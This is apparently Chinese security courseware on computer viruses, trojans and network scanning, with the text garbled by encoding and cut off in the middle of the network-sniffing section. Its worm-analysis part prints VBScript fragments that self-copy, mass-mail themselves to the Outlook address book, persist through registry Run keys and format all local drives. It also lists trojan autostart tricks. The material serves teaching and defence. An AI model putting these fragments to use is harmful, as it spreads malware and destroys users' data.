計(jì)算機(jī)信息安全技術(shù) 課件 第4、5章 計(jì)算機(jī)病毒、網(wǎng)絡(luò)攻擊與防范

第四章計(jì)算機(jī)病毒4.1概述4.2計(jì)算機(jī)病毒的特征及分類 4.3常見的病毒類型4.4計(jì)算機(jī)病毒制作與反病毒技術(shù)

4.1概述帶有惡意目的的破壞程序,統(tǒng)稱為惡意代碼。計(jì)算機(jī)病毒、木馬、間諜軟件、惡意廣告、流氓軟件、邏輯炸彈、后門、僵尸網(wǎng)絡(luò)、惡意腳本等軟件或代碼片段。計(jì)算機(jī)病毒屬于惡意代碼的一種;在廣義上，計(jì)算機(jī)病毒就是各種惡意代碼的統(tǒng)稱。4.1概述計(jì)算機(jī)病毒最早由美國(guó)南加州大學(xué)的FredCohen提出。在1983年編寫，小程序，自我復(fù)制，并能在計(jì)算機(jī)中傳播。無(wú)害，潛伏，傳染。FredCohen博士對(duì)計(jì)算機(jī)病毒的定義：

“病毒是一種靠修改其他程序來插入或進(jìn)行自身拷貝，從而感染其他程序的一段程序?！?.1概述《中華人民共和國(guó)計(jì)算機(jī)信息系統(tǒng)安全保護(hù)條例》中計(jì)算機(jī)病毒的定義：“編制或在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者破壞數(shù)據(jù)，影響計(jì)算機(jī)使用并且能夠自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼”。計(jì)算機(jī)病毒是一個(gè)程序，或一段可執(zhí)行代碼。4.1概述

計(jì)算機(jī)病毒的發(fā)展1949年馮·諾伊曼，在論文《TheoryandOrganizationofComplicatedAutomata》里給出了計(jì)算機(jī)病毒的雛形。1983年第一個(gè)病毒產(chǎn)生（FredCohen）1986年P(guān)akistan病毒（Basit和Amjad）1988年蠕蟲病毒（Morris）1989年引導(dǎo)型病毒1990年，復(fù)合病毒，可以感染Com和EXE文件。1995年，病毒生成器產(chǎn)生，幽靈病毒肆虐。1997年宏病毒出現(xiàn)。1998年CIH病毒（Windows病毒）。2004年蠕蟲病毒泛濫。2006年熊貓燒香病毒。2011年“僵尸網(wǎng)絡(luò)”病毒。2013年勒索病毒出現(xiàn)。2017年基于“永恒之藍(lán)”改造的勒索病毒擴(kuò)散。4.1概述

4.1概述計(jì)算機(jī)病毒的危害（1）占用磁盤空間，直接破壞數(shù)據(jù)信息（2）搶占系統(tǒng)資源，干擾系統(tǒng)的正常運(yùn)行（3）計(jì)算機(jī)病毒錯(cuò)誤與不可預(yù)見的危害（4）給用戶造成嚴(yán)重的心理方面的影響壓力4.2計(jì)算機(jī)病毒的特征及分類計(jì)算機(jī)病毒特征

傳染性破壞性隱蔽性寄生性可觸發(fā)性計(jì)算機(jī)病毒的基本特征按病毒按寄生方式分類網(wǎng)絡(luò)病毒文件病毒引導(dǎo)型病毒混合型病毒按傳播媒介分類單機(jī)病毒網(wǎng)絡(luò)病毒按計(jì)算機(jī)病毒的鏈接方式分類源碼型病毒嵌入型病毒外殼型病毒譯碼型病毒操作系統(tǒng)型病毒計(jì)算機(jī)病毒的分類計(jì)算機(jī)病毒的分類按病毒攻擊的操作系統(tǒng)分類Dos病毒W(wǎng)indows病毒其他操作系統(tǒng)病毒按病毒的攻擊類型分類攻擊微型計(jì)算機(jī)的病毒攻擊小型機(jī)的病毒攻擊工作站的病毒4.3常見的計(jì)算機(jī)病毒引導(dǎo)型病毒專門感染磁盤引導(dǎo)扇區(qū)或硬盤主引導(dǎo)區(qū)。按其寄生對(duì)象可分為：MBR（主引導(dǎo)區(qū)）病毒BR（引導(dǎo)區(qū)）病毒。引導(dǎo)型病毒一般通過修改int13H中斷向量將病毒傳染給U盤等存儲(chǔ)介質(zhì)，而新的int13H中斷向量地址指向內(nèi)存高端的病毒程序。引導(dǎo)型病毒的感染對(duì)象相對(duì)固定。文件型病毒通過文件系統(tǒng)進(jìn)行感染的病毒統(tǒng)稱文件型病毒。EXE文件病毒。將自身代碼添加在宿主程序中，通過修改指令指針的方式，指向病毒起始位置來獲取控制權(quán)。PE病毒當(dāng)前產(chǎn)生重大影響的病毒類型，如“CIH”、“尼姆達(dá)”、“求職信”、“中國(guó)黑客”等。這類病毒主要感染W(wǎng)indows系統(tǒng)中的PE文件格式文件(如EXE,SCR,DLL等)。文件型病毒

蠕蟲通過網(wǎng)絡(luò)傳播的惡意代碼。與文件型病毒和引導(dǎo)性病毒不同，蠕蟲不利用文件寄生，也不感染引導(dǎo)區(qū)，蠕蟲的感染目標(biāo)是網(wǎng)絡(luò)中的所有計(jì)算機(jī)。蠕蟲與木馬

蠕蟲的主要特點(diǎn)：(1)主動(dòng)攻擊。蠕蟲在本質(zhì)上已變?yōu)楹诳腿肭值墓ぞ撸瑥穆┒磼呙璧焦粝到y(tǒng)，再到復(fù)制副本，整個(gè)過程全部由蠕蟲自身主動(dòng)完成。(2)傳播方式多樣。包括文件、電子郵件、Web服務(wù)器、網(wǎng)頁(yè)和網(wǎng)絡(luò)共享等。(3)制作技術(shù)不同于傳統(tǒng)的病毒。許多蠕蟲病毒是利用當(dāng)前最新的編程語(yǔ)言和編程技術(shù)來實(shí)現(xiàn)的，容易修改以產(chǎn)生新的變種。(4)行蹤隱蔽。蠕蟲在傳播過程中不需要像傳統(tǒng)病毒那樣要用戶的輔助工作，所以在蠕蟲傳播的過程中，用戶很難察覺。(5)反復(fù)性。如果沒有修復(fù)系統(tǒng)漏洞，重新接入到網(wǎng)絡(luò)的計(jì)算機(jī)仍然有被重新感染的危險(xiǎn)。蠕蟲與木馬木馬一種典型的黑客程序，它是一種基于遠(yuǎn)程控制的黑客工具。通過木馬，攻擊者可以遠(yuǎn)程竊取用戶計(jì)算機(jī)上的所有文件、查看系統(tǒng)消息、竊取用戶口令、篡改文件和數(shù)據(jù)、接收?qǐng)?zhí)行非授權(quán)者的指令、刪除文件甚至格式化硬盤。蠕蟲與木馬木馬實(shí)際上是一個(gè)C/S結(jié)構(gòu)的程序：服務(wù)端程序+客戶端程序。以冰河程序?yàn)槔罕豢刂贫丝梢暈橐慌_(tái)服務(wù)器運(yùn)行G_Server.exe控制端是一臺(tái)客戶機(jī)安裝了G_Client.exe控制程序。客戶端向服務(wù)端的端口提出連接請(qǐng)求，服務(wù)端的相應(yīng)程序就會(huì)自動(dòng)運(yùn)行，響應(yīng)客戶端的請(qǐng)求。蠕蟲與木馬木馬的傳播方式：（1）以郵件附件的形式傳播?？刂贫藢⒛抉R程序偽裝后，捆綁在小游戲上，或者將木馬程序的圖標(biāo)直接修改為html,txt,jpg等文件的圖標(biāo)，然后將該木馬程序添加到附件中，發(fā)送給收件人。（2）通過聊天軟件的文件發(fā)送功能。在聊天對(duì)話的過程中，利用文件傳送功能發(fā)送偽裝后的木馬程序給對(duì)方。（3）通過軟件下載網(wǎng)站傳播。有些網(wǎng)站可能會(huì)被攻擊者利用，將木馬捆綁在軟件上，用戶下載軟件后如果沒有進(jìn)行安全檢查就進(jìn)行安裝，木馬就會(huì)駐留內(nèi)存。（4）通過病毒和蠕蟲傳播。某些病毒和蠕蟲本身就具備木馬的功能，或可能成為木馬的宿主而傳播木馬。（5）通過帶木馬的磁盤/光盤傳播。蠕蟲與木馬宏病毒宏病毒是用宏腳本編寫的程序。宏病毒利用一些數(shù)據(jù)處理系統(tǒng)內(nèi)置宏命令的特性，把特定的宏命令代碼附加在指定的文件上，通過文件的打開或關(guān)閉來獲取系統(tǒng)的控制權(quán)，同時(shí)實(shí)現(xiàn)宏命令在不同文件之間的共享和傳遞，以實(shí)現(xiàn)病毒傳染。其他病毒介紹

網(wǎng)頁(yè)病毒網(wǎng)頁(yè)病毒使用腳本語(yǔ)言編寫的惡意代碼，利用瀏覽器的漏洞來實(shí)現(xiàn)病毒植入。當(dāng)用戶登錄某些含有網(wǎng)頁(yè)病毒的網(wǎng)站時(shí)，網(wǎng)頁(yè)病毒便被悄悄激活，這些病毒一旦激活，可以利用系統(tǒng)的一些資源進(jìn)行破壞。其他病毒介紹其他病毒介紹僵尸網(wǎng)絡(luò)是一種被非法安裝在僵尸主機(jī)中，執(zhí)行遠(yuǎn)程控制與任務(wù)分發(fā)等任務(wù)的惡意代碼。由傳統(tǒng)的網(wǎng)絡(luò)蠕蟲和木馬發(fā)展而來的一種新型攻擊、感染形式。僵尸網(wǎng)絡(luò)實(shí)現(xiàn)了控制邏輯與攻擊任務(wù)的分離，僵尸主機(jī)中的僵尸程序負(fù)責(zé)控制邏輯，而攻擊任務(wù)由控制者根據(jù)需求來動(dòng)態(tài)分發(fā)。其他病毒介紹Rootkit是一種特殊類型的惡意軟件，主要用于隱藏自己及其他軟件。Rootkit通常是一個(gè)由多種程序組成的工具包，其中包含各種輔助工具。4.4計(jì)算機(jī)病毒制作與反病毒技術(shù)4.4.1計(jì)算機(jī)病毒的一般構(gòu)成4.4.2計(jì)算機(jī)病毒制作技術(shù)4.4.3病毒的檢測(cè)與查殺計(jì)算機(jī)病毒的一般構(gòu)成1．安裝模塊病毒程序通過自身的程序?qū)崿F(xiàn)自啟動(dòng)并安裝到系統(tǒng)中，不同類型病毒程序用不同安裝方法。2．傳染模塊（1）傳染控制部分。病毒一般都有一個(gè)控制條件，一旦滿足這個(gè)條件就開始感染。例如，病毒先判斷某個(gè)文件是否是.EXE文件，如果是再進(jìn)行傳染，否則再尋找下一個(gè)文件；（2）傳染判斷部分。每個(gè)病毒程序都有一個(gè)標(biāo)記，在傳染時(shí)將判斷這個(gè)標(biāo)記，如果磁盤或者文件已經(jīng)被傳染就不再傳染，否則就要傳染了；（3）傳染操作部分。在滿足傳染條件時(shí)進(jìn)行傳染操作。

3．破壞模塊計(jì)算機(jī)病毒的最終目的是進(jìn)行破壞，其破壞的基本手段就是刪除文件或數(shù)據(jù)。破壞模塊包括兩部分：一是激發(fā)控制，另一個(gè)就是破壞操作?；灸K計(jì)算機(jī)病毒制作技術(shù)計(jì)算機(jī)病毒制作技術(shù)采用自加密技術(shù)采用變形技術(shù)采用特殊的隱形技術(shù)對(duì)抗計(jì)算機(jī)病毒防范系統(tǒng)反跟蹤技術(shù)病毒的檢測(cè)與查殺

病毒的檢測(cè)（1）特征代碼法（2）校驗(yàn)和法（3）行為監(jiān)測(cè)法（4）軟件模擬法病毒的檢測(cè)與查殺1．特征代碼法從病毒程序中抽取一段獨(dú)一無(wú)二、足以代表該病毒特征的二進(jìn)制程序代碼，并將這段代碼作為判斷該病毒的依據(jù)，這就是所謂的病毒特征代碼。必須不斷更新病毒資料庫(kù)，否則檢測(cè)工具便會(huì)過期老化。特征代碼法的優(yōu)點(diǎn)檢測(cè)準(zhǔn)確快速可識(shí)別病毒的名稱缺點(diǎn)不能檢測(cè)未知病毒、變種病毒和隱蔽性病毒，需定期更新病毒資料庫(kù)，具有滯后性。病毒的檢測(cè)與查殺2．校驗(yàn)和法校驗(yàn)和法是根據(jù)文件的內(nèi)容，計(jì)算其校驗(yàn)和。檢測(cè)時(shí)將文件校驗(yàn)和與保存的校驗(yàn)和做比較，若不同則判斷為被感染病毒。校驗(yàn)和法可以采用三種方式：

（1）在檢測(cè)病毒工具中加入校驗(yàn)和法。（2）在應(yīng)用程序中加入校驗(yàn)和自我檢查功能。

（3）將校驗(yàn)和檢查程序常駐內(nèi)存。病毒的檢測(cè)與查殺3．行為監(jiān)測(cè)法行為監(jiān)測(cè)法是將病毒中比較特殊的共同行為歸納起來。當(dāng)程序運(yùn)行時(shí)監(jiān)視其行為，發(fā)現(xiàn)類似病毒行為，立即報(bào)警。4．軟件模擬法用程序代碼虛擬一個(gè)CPU、各個(gè)寄存器、硬件端口也虛擬出來，調(diào)入被調(diào)的“樣本”，通過內(nèi)存和寄存器以及端口的變化來了解程序的執(zhí)行情況。將病毒放到虛擬機(jī)中執(zhí)行，則病毒的傳染和破壞等動(dòng)作會(huì)被反映出來。蠕蟲病毒分析

蠕蟲病毒是目前對(duì)計(jì)算機(jī)威脅最大的網(wǎng)絡(luò)病毒，蠕蟲病毒的特征：1．蠕蟲病毒的自我復(fù)制能力用VB腳本語(yǔ)言編寫實(shí)現(xiàn)自我復(fù)制程序。

SetobjFs=CreateObject("Scripting.FileSystemObject")‘創(chuàng)建一個(gè)文件系統(tǒng)對(duì)象

Setfso=objFs.CreateTextFile("c:\virus.txt",1)‘通過文件系統(tǒng)對(duì)象的方法創(chuàng)建TXT文件。如果把這兩行保存成為.vbs的VB腳本文件，單擊鼠標(biāo)就會(huì)在C盤中創(chuàng)建一個(gè)TXT文件了。

如果把上述第二行改為：

objFs.GetFile(WScript.ScriptFullName).Copy(“C:\virus.vbs”)

就可以實(shí)現(xiàn)自身復(fù)制到C盤virus.vbs文件上。病毒的檢測(cè)與查殺2．蠕蟲病毒的傳播性SetobjOA=Wscript.CreateObject（“Outlook.Application”）‘創(chuàng)建一個(gè)OUTLOOK應(yīng)用的對(duì)象SetobjMapi=objOA.GetNameSpace（“MAPI”）‘取得MAPI名字空間

Fori=1toobjMapi.AddressLists.Count

‘遍歷地址簿

SetobjAddList=objMapi.AddressLists（i）

Forj=1ToobjAddList.AddressEntries.CountSetobjMail=objOA.CreateItem（0）

objMail.Recipients.Add（objAddList.AddressEntries（j））‘取得收件人郵件地址objMail.Subject=“你好!”

‘設(shè)置郵件主題

objMail.Body=“這次給你的附件，是我的新文檔！”

‘設(shè)置信件內(nèi)容objMail.Attachments.Add（“c:\virus.vbs”）‘把自己作為附件擴(kuò)散出去

objMail.Send‘發(fā)送郵件

NextNextSetobjMapi=Nothing‘清空objMapi變量，釋放資源

SetobjOA=Nothing‘清空objOA變量病毒的檢測(cè)與查殺3．蠕蟲病毒的潛伏性

以下是愛蟲病毒中的部分代碼：OnErrorResumeNext‘容錯(cuò)語(yǔ)句，避免程序崩潰dimwscr,rrsetwscr=CreateObject（"WScript.Shell"）‘激活

WScript.Shell對(duì)象rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WindowsScriptingHost\Settings\Timeout"）‘讀入注冊(cè)表中的超時(shí)鍵值if（rr>=1）

then‘超時(shí)設(shè)置wscr.RegWrite“HKEY_CURRENT_USER\Software\Microsoft\WindowsScriptingHost\Settings\Timeout”,0,“REG_DWORD”endif病毒的檢測(cè)與查殺修改注冊(cè)表，使得每次系統(tǒng)啟動(dòng)時(shí)自動(dòng)執(zhí)行腳本文件。regcreate“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32“,dirsystem&”\MSKernel32.vbs”regcreate“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL,“dirwin&”\Win32DLL.vbs”4．蠕蟲病毒的觸發(fā)性

x=time（）

ifx=xx.xx.xxthen…………

endif病毒的檢測(cè)與查殺5．蠕蟲病毒的破壞性

subkillc（）‘破壞硬盤的過程OnErrorResumeNext‘容錯(cuò)語(yǔ)句，避免程序崩潰dimfs,auto,disc,ds,ss,i,x,dirSetfs=CreateObject(“Scripting.FileSystemObject”)Setauto=fs.CreateTextFile（“c:\Autoexec.bat”,True）‘建立或修改自動(dòng)批處理auto.WriteLine（“@echooff”）‘屏蔽掉刪除的進(jìn)程auto.WriteLine（“Smartdrv”）‘加載磁盤緩沖

Setdisc=fs.Drives‘得到磁盤驅(qū)動(dòng)器的集合ForEachdsindiscIfds.DriveType=2Then‘如果磁盤驅(qū)動(dòng)器是本地盤

ss=ss&ds.DriveLetter‘就將符號(hào)連在一起EndIfNext病毒的檢測(cè)與查殺ss=LCase（StrReverse（Trim（ss）））‘得到符號(hào)串的反向小寫

Fori=1toLen（ss）‘遍歷每個(gè)磁盤驅(qū)動(dòng)器x=Mid（ss,i,1）

‘讀每個(gè)磁盤驅(qū)動(dòng)器的符號(hào)auto.WriteLine（“format/autotest/q/u“&x&”:”）‘反向

（從Z：到A：）自動(dòng)格式化磁盤驅(qū)動(dòng)器nextauto.Close‘關(guān)閉批處理文件setdir=fs.GetFile（“c:\Autoexec.bat”）dir.attributes=dir.attributes+2‘將自動(dòng)批處理文件改為隱藏病毒的檢測(cè)與查殺應(yīng)對(duì)蠕蟲病毒的對(duì)策復(fù)制功能的控制禁止“FileSystemObject”的使用，可以有效控制VBS病毒的傳播具體操作方法：用regsvr32scrrun.dll/u這條命令就可以禁止文件系統(tǒng)對(duì)象。破解病毒的破壞性。把本地的帶有破壞性的程序改名字，比如把改成，那樣病毒的編輯者就無(wú)法用調(diào)用該命令來實(shí)現(xiàn)這一功能。破解病毒的潛伏性及觸發(fā)性功能模塊關(guān)閉Wscript.exe的程序在后臺(tái)運(yùn)行在“開始”菜單的“運(yùn)行”里輸入“Wscript”，然后會(huì)彈出一個(gè)窗體。單擊“經(jīng)過以下數(shù)秒終止腳本”前面的復(fù)選框，使復(fù)選框前面打起鉤，然后調(diào)整下方的時(shí)間設(shè)為最小值即可。這樣可以破解一部分此類病毒的潛伏，消除潛伏性自然觸發(fā)性就破解了。由于蠕蟲病毒大多是用VBScript腳本語(yǔ)言編寫的，而VBScript代碼是通過WindowsScriptHost來解釋執(zhí)行的，因此將WindowsScriptHost刪除/禁止，就再也不用擔(dān)心這些用VBS和JS編寫的病毒了！即刪除、更名WScript.exe和JScript.exe病毒的檢測(cè)與查殺病毒的檢測(cè)與查殺木馬的基本原理

木馬本質(zhì)上是一個(gè)網(wǎng)絡(luò)客戶/服務(wù)程序（Client/Server），一般由兩部分組成：服務(wù)端程序，另一個(gè)是客戶端程序。以冰河程序?yàn)槔赩B中，可以使用WinSock控件來編寫網(wǎng)絡(luò)客戶服務(wù)程序，實(shí)現(xiàn)方法如下：服務(wù)端：

G_Server.LocalPort=7626（冰河的默認(rèn)端口，可以改為別的值）

G_Server.Listen（等待連接）客戶端：

G_Client.RemoteHost=ServerIP（設(shè)遠(yuǎn)端地址為服務(wù)器地址）

G_Client.RemotePort=7626（設(shè)遠(yuǎn)程端口為冰河的默認(rèn)端口）

G_Client.Connect（調(diào)用Winsock控件的連接方法）其中，G_Server和G_Client均為Winsock控件。病毒的檢測(cè)與查殺木馬的啟動(dòng)方式黑客將木馬程序捆綁在一些常用的軟件上，將木馬悄悄安裝到計(jì)算機(jī)中。在Windows系統(tǒng)中，黑客實(shí)現(xiàn)程序自啟動(dòng)的方法很多，常見方法：1．修改系統(tǒng)配置文件通過修改系統(tǒng)配置文件System.ini、Win.ini來實(shí)現(xiàn)木馬的自啟動(dòng)。Win.ini有兩個(gè)數(shù)據(jù)項(xiàng)“l(fā)oad=”和“run=”，如果木馬需要在系統(tǒng)啟動(dòng)后運(yùn)行一個(gè)程序，只要在“l(fā)oad=”和“run=”后添加該程序的程序名即可2．修改注冊(cè)表修改注冊(cè)表是木馬最常用的攻擊和入侵手段：HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run*的鍵。如果想讓程序在系統(tǒng)啟動(dòng)的過程中啟動(dòng)，向該目錄添加一個(gè)子項(xiàng)即可。病毒的檢測(cè)與查殺3．通過文件關(guān)聯(lián)啟動(dòng)通過.exe文件關(guān)聯(lián)exefile，將注冊(cè)表中HKEY_CLASSES_ROOT\exefile\shell\open\command的默認(rèn)““%1”%*”改成“x:\xxx\bsy.exe”（木馬程序的路徑），讓系統(tǒng)在執(zhí)行.exe程序時(shí)就自動(dòng)運(yùn)行木馬程序bsy.exe。通常修改的還有.txt文件關(guān)聯(lián)txtfile，只要讀取.txt文本文件就執(zhí)行木馬程序等。4．利用Autorun.inf文件自動(dòng)運(yùn)行功能在E盤根目錄下新建一個(gè)Autorun.inf文件，用記事本打開它，輸入如下內(nèi)容：

[autorun]open=Notepad.exe

保存后重新啟動(dòng)，進(jìn)入“我的電腦”，然后雙擊E盤盤符，記事本被打開了，而E盤卻沒有打開。5．利用對(duì)動(dòng)態(tài)連接庫(kù)（DLL）的調(diào)用黑客可以將木馬程序捆綁到DLL上（如kernel32.dll），當(dāng)用戶使用API函數(shù)時(shí)，黑客就會(huì)先啟動(dòng)木馬程序，然后再調(diào)用真正的函數(shù)完成API函數(shù)功能。病毒的檢測(cè)與查殺木馬的查殺1．查看注冊(cè)表在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion和

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion下所有以“Run”開頭的鍵值名有沒有可疑的文件名。2．檢查啟動(dòng)組

啟動(dòng)組對(duì)應(yīng)的文件夾為：C:windows\startmenu\programs\startup，經(jīng)常檢查啟動(dòng)組中是否有異常的文件。

3．檢查系統(tǒng)配置文件檢查Win.ini、System.ini、Autoexec.bat、Winstart.bat等系統(tǒng)配置文件?，F(xiàn)在修改System.ini中Shell值的情況要多一些，如果在System.ini中看到：Shell=Explorer.exewindows.exe時(shí)，這個(gè)windows.exe有可能就是木馬程序。病毒的檢測(cè)與查殺4．查看端口與進(jìn)程使用Windows本身自帶的netstat-an命令查看與本機(jī)建立連接的IP以及本機(jī)偵聽的端口。也可以使用ActivePorts工具監(jiān)視計(jì)算機(jī)所有打開的TCP/IP/UDP端口。如果發(fā)現(xiàn)有可疑的端口開放，可以先記下這個(gè)端口號(hào)，然后進(jìn)入“任務(wù)管理器”，就可看到系統(tǒng)正在運(yùn)行的全部進(jìn)程。

5．查看目前運(yùn)行的服務(wù)

服務(wù)也是很多木馬用來保持在系統(tǒng)中處于運(yùn)行狀態(tài)的方法之一。使用“netstart”命令可查看系統(tǒng)中哪些服務(wù)在開啟，如果發(fā)現(xiàn)可疑的服務(wù)，可以停止并禁用它。

6．檢查系統(tǒng)帳戶

黑客也可能在計(jì)算機(jī)中潛伏一個(gè)賬戶來控制你的計(jì)算機(jī)。他們采用的方法就是激活一個(gè)系統(tǒng)中的很少使用的默認(rèn)賬戶，然后把這個(gè)賬戶的權(quán)限提升為管理員權(quán)限，通過該賬戶控制你的計(jì)算機(jī)。病毒的檢測(cè)與查殺病毒的預(yù)防與清除（1）安全地啟動(dòng)計(jì)算機(jī)系統(tǒng)（2）安全使用計(jì)算機(jī)系統(tǒng)（3）備份重要的數(shù)據(jù)（4）謹(jǐn)慎下載文件（5）留意計(jì)算機(jī)系統(tǒng)的異常（6）使用正版殺毒軟件本章小結(jié)（1）掌握計(jì)算機(jī)病毒的定義、特征、病毒程序的構(gòu)成；（2）了解病毒的傳播途徑、分類；（3）對(duì)常見的病毒有一定的了解；（4）掌握計(jì)算機(jī)病毒的一般制作技術(shù)；（5）了解蠕蟲病毒實(shí)現(xiàn)方法；（6）掌握木馬基本原理和查殺方式；（7）掌握計(jì)算機(jī)病毒與黑客的防范基本方法。第五章網(wǎng)絡(luò)攻擊與防范技術(shù)5.1網(wǎng)絡(luò)攻擊概述與分類5.2目標(biāo)探測(cè) 5.3掃描的概念與原理5.4網(wǎng)絡(luò)監(jiān)聽5.5緩沖區(qū)溢出攻擊5.6注入式攻擊5.7拒絕服務(wù)攻擊5.8 欺騙攻擊與防范5.1網(wǎng)絡(luò)攻擊概述與分類網(wǎng)絡(luò)容易受到攻擊的原因—網(wǎng)絡(luò)軟件不完善+協(xié)議本身存在安全缺陷。TCP/IP網(wǎng)絡(luò)協(xié)議存在大量的安全漏洞。TCP/IP是冷戰(zhàn)時(shí)期的產(chǎn)物，目標(biāo)是要保證通達(dá)，保證傳輸?shù)拇肢E性。通過來回確認(rèn)來保證數(shù)據(jù)的完整性，不確認(rèn)則要重傳。TCP/IP沒有內(nèi)在的控制機(jī)制來支持源地址的鑒別。黑客利用TCP/IP的漏洞，可以使用偵聽的方式來截獲數(shù)據(jù)，能對(duì)數(shù)據(jù)進(jìn)行檢查，推測(cè)TCP的系列號(hào)，修改傳輸路由，修改鑒別過程，插入黑客的數(shù)據(jù)流。莫里斯病毒就是利用這一點(diǎn)，給互聯(lián)網(wǎng)造成巨大的危害。近十多年新增安全漏洞發(fā)布趨勢(shì)數(shù)據(jù)來源：國(guó)家信息安全漏洞庫(kù)CNNVD5.1網(wǎng)絡(luò)攻擊概述與分類網(wǎng)絡(luò)攻擊目的炫耀自己的技術(shù)；賺錢；竊取數(shù)據(jù)；報(bào)復(fù)；抗議或宣示。

5.1網(wǎng)絡(luò)攻擊概述與分類常用的攻擊方法竊聽欺騙拒絕服務(wù)數(shù)據(jù)驅(qū)動(dòng)攻擊網(wǎng)絡(luò)攻擊的一般流程5.2目標(biāo)探測(cè)目標(biāo)探測(cè)是防范黑客攻擊行為的手段之一也是黑客進(jìn)行攻擊的第一步。5.2.1目標(biāo)探測(cè)的內(nèi)容1．外網(wǎng)信息。包括域名、管理員信息、網(wǎng)絡(luò)地址范圍、網(wǎng)絡(luò)位置、網(wǎng)絡(luò)地址分配機(jī)構(gòu)信息、系統(tǒng)提供的各種服務(wù)和網(wǎng)絡(luò)安全配置等。2．內(nèi)網(wǎng)信息。包括內(nèi)部網(wǎng)絡(luò)協(xié)議、拓?fù)浣Y(jié)構(gòu)、系統(tǒng)體系結(jié)構(gòu)和安全配置等。5.2.2目標(biāo)探測(cè)的方法1．確定目標(biāo)范圍

Ping命令Whois查詢

Whois查詢就是查詢域名和IP地址的注冊(cè)信息。國(guó)際域名由設(shè)在美國(guó)的Internet信息管理中心（InterNIC）和它設(shè)在世界各地的認(rèn)證注冊(cè)商管理國(guó)內(nèi)域名由中國(guó)互聯(lián)網(wǎng)絡(luò)信息中心（CNNIC）管理。2.分析目標(biāo)網(wǎng)絡(luò)信息使用專用的工具，如VisualRoute等。這些軟件的主要功能：快速分析和辨別Internet連接的來源，標(biāo)識(shí)某個(gè)IP地址的地理位置等。3.分析目標(biāo)網(wǎng)絡(luò)路由了解信息從一臺(tái)計(jì)算機(jī)到達(dá)互聯(lián)網(wǎng)另一端的另一臺(tái)計(jì)算機(jī)傳播路徑，常見的檢測(cè)工具為Tracert/TraceRoute。5.3掃描概念和原理計(jì)算機(jī)掃描就是對(duì)計(jì)算機(jī)系統(tǒng)或者其他網(wǎng)絡(luò)設(shè)備進(jìn)行與安全相關(guān)的檢測(cè)，以找出安全隱患和可被黑客利用的漏洞。掃描技術(shù)分類主機(jī)掃描端口掃描漏洞掃描5.3.1主機(jī)掃描技術(shù)簡(jiǎn)單主機(jī)掃描技術(shù)(1)發(fā)送ICMPEchoRequest數(shù)據(jù)包到目標(biāo)主機(jī)；(2)Ping掃描；(3)發(fā)送ICMPEchoRequest到廣播地址或者目標(biāo)網(wǎng)絡(luò)地址。復(fù)雜主機(jī)掃描技術(shù)

(1)異常的IP包頭；(2)IP頭中設(shè)置無(wú)效的字段值；(3)錯(cuò)誤的數(shù)據(jù)分片；(4)反向映射探測(cè)。

5.3.2端口掃描技術(shù)

1．TCPconnect掃描

最基本的TCP掃描，操作系統(tǒng)提供的connect（）系統(tǒng)調(diào)用，用來與每一個(gè)目標(biāo)計(jì)算機(jī)的端口進(jìn)行連接。如果端口處于偵聽狀態(tài)，那么connect（）就能成功。否則，該端口是不能用的，即沒有提供服務(wù)。

優(yōu)勢(shì)：沒有權(quán)限限制速度快缺陷：容易暴露2．TCPSYN掃描

3．TCPFIN掃描（關(guān)閉時(shí)）

4．TCPXmas掃描（關(guān)閉時(shí)）5．TCPNULL掃描（關(guān)閉時(shí)）

5．UDP掃描（關(guān)閉時(shí)）UDP掃描并不可靠。1)目標(biāo)主機(jī)可以禁止任何UDP包通過；2)UDP本身不是可靠的傳輸協(xié)議，數(shù)據(jù)傳輸?shù)耐暾圆荒艿玫奖ＷC；3)系統(tǒng)在協(xié)議棧的實(shí)現(xiàn)上有差異，對(duì)一個(gè)關(guān)閉的UDP端口，可能不會(huì)返回任何信息，而只是簡(jiǎn)單的丟棄。6．FTP返回掃描

FTP代理掃描是用一個(gè)代理的FTP服務(wù)器來掃描TCP端口。

假設(shè)S是掃描機(jī)，T是掃描目標(biāo)，F(xiàn)是一個(gè)支持代理選項(xiàng)的FTP服務(wù)器，能夠跟S和T建立連接，F(xiàn)TP端口掃描步驟如下：

（1）

S與F建立一個(gè)FTP會(huì)話，使用PORT命令聲明一個(gè)選擇的端口p-T作為代理傳輸所需要的被動(dòng)端口；（2）然后S使用一個(gè)LIST命令嘗試啟動(dòng)一個(gè)到p-T的數(shù)據(jù)傳輸；

（3）如果端口p-T確實(shí)在監(jiān)聽，傳輸就會(huì)成功，返回碼150和226被發(fā)送回給S。否則S會(huì)收到“425Canbuilddataconnection:Connectionrefused”

的應(yīng)答;

（4）S持續(xù)使用PORT和LIST命令，直到對(duì)T上所有的選擇端口掃描完畢為止。這種方法的優(yōu)點(diǎn)是難以跟蹤，能穿過防火墻。主要缺點(diǎn)是速度很慢，有的FTP服務(wù)器最終還是能得到一些線索，關(guān)閉代理功能。防止端口掃描防止端口掃描：(1)關(guān)閉閑置和有潛在危險(xiǎn)的端口。(2)利用網(wǎng)絡(luò)防火墻軟件。5.3.3漏洞掃描漏洞掃描是對(duì)目標(biāo)網(wǎng)絡(luò)或者目標(biāo)主機(jī)進(jìn)行安全漏洞檢測(cè)與分析，發(fā)現(xiàn)可能被攻擊者利用的漏洞。通用漏洞掃描器構(gòu)成：控制臺(tái)模塊掃描活動(dòng)處理模塊掃描引擎模塊結(jié)果處理模塊和漏洞庫(kù)。Nmap、X-Scan、SuperScan、ShadowSecurityScanner、AppScan、Nessus5.4網(wǎng)絡(luò)監(jiān)聽網(wǎng)絡(luò)監(jiān)聽是提供給網(wǎng)絡(luò)安全管理人員進(jìn)行網(wǎng)絡(luò)管理的工具，用來監(jiān)視網(wǎng)絡(luò)的狀態(tài)、數(shù)據(jù)流動(dòng)情況以及網(wǎng)絡(luò)上傳輸?shù)男畔⒌?，黑客也可以利用網(wǎng)絡(luò)監(jiān)聽來截取主機(jī)口令等。5.4.1網(wǎng)絡(luò)監(jiān)聽原理

